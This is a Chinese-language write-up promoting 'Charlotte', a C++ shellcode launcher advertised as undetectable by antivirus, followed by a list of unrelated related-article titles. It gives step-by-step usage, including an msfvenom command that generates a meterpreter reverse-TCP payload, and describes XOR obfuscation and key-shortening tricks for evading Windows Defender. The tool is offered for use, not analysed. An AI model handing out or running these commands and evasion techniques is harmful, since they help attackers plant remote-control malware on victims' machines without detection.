关于Charlotte
Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

工具特性
截止至2021年5月13日之前,该工具的检测结果为0/26;
该工具支持动态调用Win32 API函数;
对Shellcode和函数名进行异或加密;
每次运行随机化异或密钥和变量;
在Kali Linux上,只需运行“apt-get install mingw-w64*”即可;
支持随机字符串长度和异或密钥长度;

antiscan.me

工具使用
首先,我们需要使用git clone命令将该项目源码克隆至本地,并使用脚本工具生成Shellcode文件。具体操作示例如下:
git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*
cd charlotte
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=YOURIPLPORT=YOUR_IP LPORT=YOURI​PLPORT=YOUR_PORT -f raw > beacon.bin

python charlotte.py
使用msfvenom -p测试以及Cobalt Strike原始格式Payload

强化功能
很明显,Windows Defender是能够检测到.DLL代码的,但我们在POC中通过将16字节大小的异或密钥降低至9个字节,就可以规避检测了。

项目地址
Charlotte:https://github.com/9emin1/charlotte

Charlotte:不会被检测到的Shellcode启动器相关推荐

  1. 教你用Ossim平台检测网络的Shellcode攻击

    教你用Ossim平台检测网络的Shellcode攻击行为 教程: http://www.tudou.com/programs/view/-hxTm0q1tDY/ 以下是视频截图: 更多视频内容: 本文 ...

  2. 红蓝对抗之如何利用Shellcode来躲避安全检测

    写在前面的话         对于红队安全研究团队来说,一次成功的渗透测试必须是不被目标系统发现的,随着现代终端检测和响应(EDR)产品日趋成熟,红队也必须随之每日俱进.在这篇文章中,我们将跟大家介绍 ...

  3. Android ActivityManager 检测Service与Activity运行状态

    2019独角兽企业重金招聘Python工程师标准>>> 在后台与网络交互中,需要使用Service来和服务器保持连接,因此Service在被进程Kill掉后,主动开启Service是 ...

  4. 2017-2018-2 20179302《网络攻防》第十一周作业

    研究缓冲区溢出的原理,至少针对两种数据库进行差异化研究 缓冲区溢出是指当计算机向缓冲区内填充数据位数时,超过了缓冲区本身的容量,溢出的数据覆盖在合法数据上,理想的情况是程序检查数据长度并不允许输入超过 ...

  5. [转] GCC 中的编译器堆栈保护技术

    以堆栈溢出为代表的缓冲区溢出已成为最为普遍的安全漏洞.由此引发的安全问题比比皆是.早在 1988 年,美国康奈尔大学的计算机科学系研究生莫里斯 (Morris) 利用 UNIX fingered 程序 ...

  6. Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等

    Penetration_Testing_POC 搜集有关渗透测试中用到的POC.脚本.工具.文章等姿势分享,作为笔记吧,欢迎补充. Penetration_Testing_POC 请善用搜索[Ctrl ...

  7. 【渗透测试】你应该了解的大部分工具![本文仅供了解]

    资源来自51CTO安全频道(仅供参考). 渗透测试工具是被用来测试网络和应用漏洞.下面介绍多个综合型网络渗透测试工具,涵盖所有环境下的渗透测试操作: 扫描/渗透测试 OpenVAS --是一个提供多种 ...

  8. 2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践

    2017-2018-2 20155303 『网络对抗技术』Exp3:免杀原理与实践 --------CONTENTS-------- 1. 免杀原理与实践说明 实验说明 基础问题回答 2. 使用msf ...

  9. GCC 中的编译器堆栈保护技术

    以堆栈溢出为代表的缓冲区溢出已成为最为普遍的安全漏洞.由此引发的安全问题比比皆是.早在 1988 年,美国康奈尔大学的计算机科学系研究生莫里斯 (Morris) 利用 UNIX fingered 程序 ...

  10. 使用mshta.exe绕过应用程序白名单(多种方法)

    0x00 简介 很长一段时间以来,HTA文件一直被web攻击或在野恶意软件下载程序用作恶意程序的一部分.HTA文件在网络安全领域内广为人知,从红队和蓝队的角度来看,它是绕过应用程序白名单有价值的&qu ...

最新文章

  1. 本地Windows远程桌面连接阿里云Ubuntu服务器
  2. 吴恩达 coursera AI 专项五第三课(上)总结+作业答案
  3. Codeforces 986A. Fair(对物品bfs暴力求解)
  4. win10 安装程序错误,the setup files are corrupted.please obtain a new copy of the program
  5. 用eclipse开发flex程序--- 配置eclipse(flex builder 3.0)
  6. linux random不阻塞,Linux的random总是装死
  7. python编写俄罗斯方块代码详解_python如何写个俄罗斯方块
  8. VB2010(3)整型运算
  9. Oracle 11.2.0.4 RAC 最新补丁下载(11.2.0.4.200714)
  10. linux su root 限制,Linux禁止普通用户su至root
  11. 学习 Java全栈工程师6.0 初学者笔记3— 流程控制 2021-08-11
  12. python编写贪吃蛇大战_用Python实现贪吃蛇双人大战
  13. matlab非单位阶跃响应,MATLAB下二阶系统的单位阶跃响应
  14. 利用python爬取英雄联盟官网英雄皮肤
  15. python测试开发教程 龙腾_龙腾源码网京东 有货自动下单,Python 脚本 你的口罩...
  16. 员工内斗,管理者要不要插手?
  17. Java.Net互操作技术介绍
  18. VUE动态切换Button的icon
  19. 解决谷歌浏览器不能打开Axure原型的问题
  20. 一对一直播源码开发,一对一直播系统开发

热门文章

  1. MSDN URL 重写
  2. 如何参加GoToMeeting在线会议
  3. Restful API 的设计规范
  4. Java中PreparedStatement和Statement区别
  5. Java设计person类,有姓名,年龄,性别。要求:该类至多只能创建一男,一女两个对象。
  6. php db类 应用实例,PHP-Laravel(DB类操作数据库)
  7. python哈夫曼编码注意_[Python]哈夫曼编码
  8. linux5.4获取root权限,gcc++漏洞 普通用户获取root权限
  9. mysql sql语句执行到一半会怎么样?
  10. modulenotfounderror python_你所不知道的 【ModuleNotFoundError: No module named ''; '' is not a package】...